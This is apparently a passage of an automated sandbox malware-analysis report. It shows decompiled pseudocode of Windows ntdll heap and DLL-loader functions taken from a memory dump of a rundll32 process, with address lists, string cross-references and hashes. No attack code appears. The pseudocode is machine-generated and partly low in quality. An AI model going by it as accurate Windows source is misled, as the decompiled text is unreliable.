                                                                                                                0x04413e7a
                                                                                                                0x04413e7f
                                                                                                                0x04413e8c
                                                                                                                0x04413e8c
                                                                                                                0x04413e91
                                                                                                                0x00000000
                                                                                                                0x04413e91

                                                                                                                Strings
                                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 04413E97
                                                                                                                • Kernel-MUI-Language-SKU, xrefs: 04413F70
                                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 04413D8C
                                                                                                                • WindowsExcludedProcs, xrefs: 04413D6F
                                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 04413DC0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                • API String ID: 0-258546922
                                                                                                                • Opcode ID: 672b9369493548dc650d3ef8703396eb6d6217065ca14148af78dc721a4b9b3c
                                                                                                                • Instruction ID: 7a7adcae2dcabbe433363e6f646082b3df85669df46655209e18c3549bc008f0
                                                                                                                • Opcode Fuzzy Hash: 672b9369493548dc650d3ef8703396eb6d6217065ca14148af78dc721a4b9b3c
                                                                                                                • Instruction Fuzzy Hash: 12F12B72D01618EBEF11DF99C980AAFBBB9FF48750F14005BE905A7261E774AE01CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044040E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 29%
                                                                                                                			E044040E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0440B150();
					} else {
						E0440B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0440B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0440B150(", passed to %s", _t29);
					}
					_push("\n");
					E0440B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x44f6378 = 1;
						asm("int3");
						 *0x44f6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                                                                0x044040e6
                                                                                                                0x044040e8
                                                                                                                0x044040f1
                                                                                                                0x0446042d
                                                                                                                0x0446044c
                                                                                                                0x04460451
                                                                                                                0x0446042f
                                                                                                                0x04460444
                                                                                                                0x04460449
                                                                                                                0x0446045d
                                                                                                                0x04460466
                                                                                                                0x0446046e
                                                                                                                0x04460474
                                                                                                                0x04460475
                                                                                                                0x0446047a
                                                                                                                0x0446048a
                                                                                                                0x0446048c
                                                                                                                0x04460493
                                                                                                                0x04460494
                                                                                                                0x04460494
                                                                                                                0x00000000
                                                                                                                0x0446049b
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                                                                • API String ID: 0-188067316
                                                                                                                • Opcode ID: 763119c4094fff784cac732d07c80d437937258512bbb2d2eda5bbad41321bf3
                                                                                                                • Instruction ID: 47e52189e31d10805306573e478e6c721fbf0f0373ed10e6c70e5f0f54575ff4
                                                                                                                • Opcode Fuzzy Hash: 763119c4094fff784cac732d07c80d437937258512bbb2d2eda5bbad41321bf3
                                                                                                                • Instruction Fuzzy Hash: 2001F5322052909FEA25A7A6A40FB6277A4DB00B75F19C02BF4055B7C28AB4B851D525
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04438E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E04438E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x44fd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x44f8464; // 0x74720110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x44f5780 & 0x00000003) != 0) {
							E04485510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x44f5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0444B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x44f7984; // 0x352ad0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x44f8464; // 0x74720110
					 *0x44fb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E04439B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x44f5780 & 0x00000005) != 0) {
						_push(_t49);
						E04485510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                                                0x04438e0f
                                                                                                                0x04438e16
                                                                                                                0x04438e19
                                                                                                                0x04438e1b
                                                                                                                0x04438e21
                                                                                                                0x04438e7f
                                                                                                                0x04438e85
                                                                                                                0x04479354
                                                                                                                0x0447936c
                                                                                                                0x04479371
                                                                                                                0x0447937b
                                                                                                                0x04479381
                                                                                                                0x04479381
                                                                                                                0x0447937b
                                                                                                                0x04438e9d
                                                                                                                0x04438e9d
                                                                                                                0x04438e29
                                                                                                                0x04438e2c
                                                                                                                0x04438e38
                                                                                                                0x04438e3e
                                                                                                                0x04438e43
                                                                                                                0x04438eb5
                                                                                                                0x04438eb9
                                                                                                                0x044792aa
                                                                                                                0x044792af
                                                                                                                0x044792e8
                                                                                                                0x044792e8
                                                                                                                0x044792af
                                                                                                                0x04438eb9
                                                                                                                0x04438e45
                                                                                                                0x04438e53
                                                                                                                0x04438e5b
                                                                                                                0x04438e5f
                                                                                                                0x04438e78
                                                                                                                0x04438e78
                                                                                                                0x04438e7d
                                                                                                                0x04438ec3
                                                                                                                0x04438ecd
                                                                                                                0x04438ed2
                                                                                                                0x04438ed2
                                                                                                                0x04438ec5
                                                                                                                0x04438ec5
                                                                                                                0x00000000
                                                                                                                0x04438e7d
                                                                                                                0x04438e67
                                                                                                                0x04438ea4
                                                                                                                0x0447931a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04479320
                                                                                                                0x04438ea4
                                                                                                                0x04438e70
                                                                                                                0x04479325
                                                                                                                0x04479340
                                                                                                                0x04479345
                                                                                                                0x04479345
                                                                                                                0x04438e76
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 0447933B, 04479367
                                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 04479357
                                                                                                                • LdrpFindDllActivationContext, xrefs: 04479331, 0447935D
                                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0447932A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                • API String ID: 0-3779518884
                                                                                                                • Opcode ID: 8ac8d86f4e60c09a02101126f92948b513d6793a4779974174c8fffe0c7072f5
                                                                                                                • Instruction ID: 96b683d252408b9ef6eb5fd7b1fd70f9dd2f645bcc9f01173a817cc3c9777174
                                                                                                                • Opcode Fuzzy Hash: 8ac8d86f4e60c09a02101126f92948b513d6793a4779974174c8fffe0c7072f5
                                                                                                                • Instruction Fuzzy Hash: 3F41D332A00315AFFF35BA19884BA77F6F5EB08B46F05416BF814D7291EB74BC808681
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04418794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E04418794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0441934A() != 0) {
								_t159 = E0448A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x44f5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04485510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x44f5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0441849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E04418999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E04418999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x44f5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x44f5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E04422280(_t92, 0x44f86cc);
															_t94 = E044D9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E044361A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x44f5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E04418A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x44f5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x44f5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0444F380(_t136, 0x43e1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E04422280(_t108, 0x44f86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E044361A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E044D9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0441FFB0(_t118, _t156, 0x44f86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04449A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                                                0x04418799
                                                                                                                0x0441879d
                                                                                                                0x044187a1
                                                                                                                0x044187a3
                                                                                                                0x044187a8
                                                                                                                0x044187c3
                                                                                                                0x044187c3
                                                                                                                0x044187c8
                                                                                                                0x044187d1
                                                                                                                0x044187d4
                                                                                                                0x044187d8
                                                                                                                0x044187e5
                                                                                                                0x044187ec
                                                                                                                0x04469bfe
                                                                                                                0x04469c00
                                                                                                                0x04469c02
                                                                                                                0x04469c08
                                                                                                                0x04469c0d
                                                                                                                0x04469c0f
                                                                                                                0x04469c14
                                                                                                                0x04469c2d
                                                                                                                0x04469c32
                                                                                                                0x04469c37
                                                                                                                0x04469c3a
                                                                                                                0x04469c3c
                                                                                                                0x04469c42
                                                                                                                0x04469c42
                                                                                                                0x04469c3c
                                                                                                                0x04469c02
                                                                                                                0x044187da
                                                                                                                0x044187df
                                                                                                                0x044187e3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044187e3
                                                                                                                0x044187f2
                                                                                                                0x00000000
                                                                                                                0x044187fb
                                                                                                                0x044187fd
                                                                                                                0x044187fe
                                                                                                                0x0441880e
                                                                                                                0x0441880f
                                                                                                                0x04418810
                                                                                                                0x04418814
                                                                                                                0x0441881a
                                                                                                                0x0441881c
                                                                                                                0x0441881f
                                                                                                                0x04418821
                                                                                                                0x04418822
                                                                                                                0x04418824
                                                                                                                0x04418826
                                                                                                                0x0441882c
                                                                                                                0x0441882e
                                                                                                                0x04469c48
                                                                                                                0x04469c48
                                                                                                                0x04418834
                                                                                                                0x04418834
                                                                                                                0x04418837
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04418837
                                                                                                                0x0441882e
                                                                                                                0x0441883d
                                                                                                                0x04418840
                                                                                                                0x04418843
                                                                                                                0x04418846
                                                                                                                0x04418849
                                                                                                                0x0441884c
                                                                                                                0x0441884e
                                                                                                                0x04418850
                                                                                                                0x04418852
                                                                                                                0x04418854
                                                                                                                0x04418857
                                                                                                                0x044188b4
                                                                                                                0x044188b6
                                                                                                                0x044188b6
                                                                                                                0x04418859
                                                                                                                0x04418859
                                                                                                                0x04418859
                                                                                                                0x04418861
                                                                                                                0x04418866
                                                                                                                0x0441886a
                                                                                                                0x0441893d
                                                                                                                0x04418941
                                                                                                                0x00000000
                                                                                                                0x04418947
                                                                                                                0x04418947
                                                                                                                0x0441894a
                                                                                                                0x0441894c
                                                                                                                0x00000000
                                                                                                                0x04418952
                                                                                                                0x04418955
                                                                                                                0x0441895a
                                                                                                                0x0441895d
                                                                                                                0x0441895d
                                                                                                                0x0441895f
                                                                                                                0x04418961
                                                                                                                0x04418961
                                                                                                                0x04418968
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0441896a
                                                                                                                0x0441896b
                                                                                                                0x0441896e
                                                                                                                0x00000000
                                                                                                                0x04418970
                                                                                                                0x04418970
                                                                                                                0x04418970
                                                                                                                0x04418970
                                                                                                                0x04418972
                                                                                                                0x04418972
                                                                                                                0x04418974
                                                                                                                0x00000000
                                                                                                                0x0441897a
                                                                                                                0x0441897a
                                                                                                                0x0441897d
                                                                                                                0x00000000
                                                                                                                0x04418983
                                                                                                                0x04469c65
                                                                                                                0x04469c6d
                                                                                                                0x04469c72
                                                                                                                0x04469c75
                                                                                                                0x04469c75
                                                                                                                0x04469c82
                                                                                                                0x04469c86
                                                                                                                0x04469c87
                                                                                                                0x04469c88
                                                                                                                0x04469c89
                                                                                                                0x04469c8c
                                                                                                                0x04469c90
                                                                                                                0x04469c95
                                                                                                                0x04469c97
                                                                                                                0x04469ca0
                                                                                                                0x04469ca3
                                                                                                                0x04469ca9
                                                                                                                0x04469ca9
                                                                                                                0x00000000
                                                                                                                0x04469ca9
                                                                                                                0x04469ca3
                                                                                                                0x00000000
                                                                                                                0x04469c97
                                                                                                                0x0441897d
                                                                                                                0x00000000
                                                                                                                0x04418974
                                                                                                                0x04418988
                                                                                                                0x04418992
                                                                                                                0x04418996
                                                                                                                0x00000000
                                                                                                                0x04418996
                                                                                                                0x0441894c
                                                                                                                0x00000000
                                                                                                                0x04418870
                                                                                                                0x0441887b
                                                                                                                0x0441887d
                                                                                                                0x0441887f
                                                                                                                0x04418881
                                                                                                                0x04418884
                                                                                                                0x04418884
                                                                                                                0x04418886
                                                                                                                0x04418889
                                                                                                                0x0441888c
                                                                                                                0x0441888e
                                                                                                                0x04418891
                                                                                                                0x04418891
                                                                                                                0x04418898
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0441889a
                                                                                                                0x0441889b
                                                                                                                0x0441889e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044188a0
                                                                                                                0x044188a8
                                                                                                                0x044188b0
                                                                                                                0x044188b2
                                                                                                                0x044188d3
                                                                                                                0x044188d5
                                                                                                                0x00000000
                                                                                                                0x044188d7
                                                                                                                0x044188db
                                                                                                                0x044188dc
                                                                                                                0x044188e0
                                                                                                                0x044188e8
                                                                                                                0x044188ee
                                                                                                                0x044188f0
                                                                                                                0x044188f3
                                                                                                                0x044188fc
                                                                                                                0x04418901
                                                                                                                0x04418906
                                                                                                                0x0441890c
                                                                                                                0x0441890c
                                                                                                                0x0441890f
                                                                                                                0x04418916
                                                                                                                0x04418917
                                                                                                                0x04418918
                                                                                                                0x04418919
                                                                                                                0x0441891a
                                                                                                                0x0441891f
                                                                                                                0x04418921
                                                                                                                0x04469c52
                                                                                                                0x04469c55
                                                                                                                0x04469c5b
                                                                                                                0x04469cac
                                                                                                                0x04469cc0
                                                                                                                0x04469cc0
                                                                                                                0x04469c55
                                                                                                                0x04418927
                                                                                                                0x04418927
                                                                                                                0x0441892f
                                                                                                                0x04418933
                                                                                                                0x00000000
                                                                                                                0x044188f5
                                                                                                                0x044188f5
                                                                                                                0x00000000
                                                                                                                0x044188f7
                                                                                                                0x044188f7
                                                                                                                0x044188fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044188fa
                                                                                                                0x044188f5
                                                                                                                0x044188f3
                                                                                                                0x00000000
                                                                                                                0x044188d5
                                                                                                                0x00000000
                                                                                                                0x044188b2
                                                                                                                0x044188c9
                                                                                                                0x00000000
                                                                                                                0x044188c9
                                                                                                                0x0441887f
                                                                                                                0x0441886a
                                                                                                                0x04418857
                                                                                                                0x04418852
                                                                                                                0x044188bf
                                                                                                                0x044188bf
                                                                                                                0x044187aa
                                                                                                                0x044187ad
                                                                                                                0x044187ae
                                                                                                                0x044187b4
                                                                                                                0x044187b5
                                                                                                                0x044187b6
                                                                                                                0x044187b8
                                                                                                                0x044187bd
                                                                                                                0x044187c1
                                                                                                                0x044187f4
                                                                                                                0x044187fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044187c1
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04469C18
                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 04469C28
                                                                                                                • LdrpDoPostSnapWork, xrefs: 04469C1E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                                • API String ID: 0-1948996284
                                                                                                                • Opcode ID: 4e19514f8123ca22f89bdfd9bf44f10db24aa5b1412b163d2487314cb48bc5fd
                                                                                                                • Instruction ID: 363be1882b6d4368410341b56706d8b3ea8dd1cb4e0765f40d868cdbc3d3779d
                                                                                                                • Opcode Fuzzy Hash: 4e19514f8123ca22f89bdfd9bf44f10db24aa5b1412b163d2487314cb48bc5fd
                                                                                                                • Instruction Fuzzy Hash: 7F910571A00616EFEF28EF5AC881ABA73B5FF84354B14416BD905AB261E770FD01CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04417E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E04417E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0441CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0440C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x44f5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04485510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x44f5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
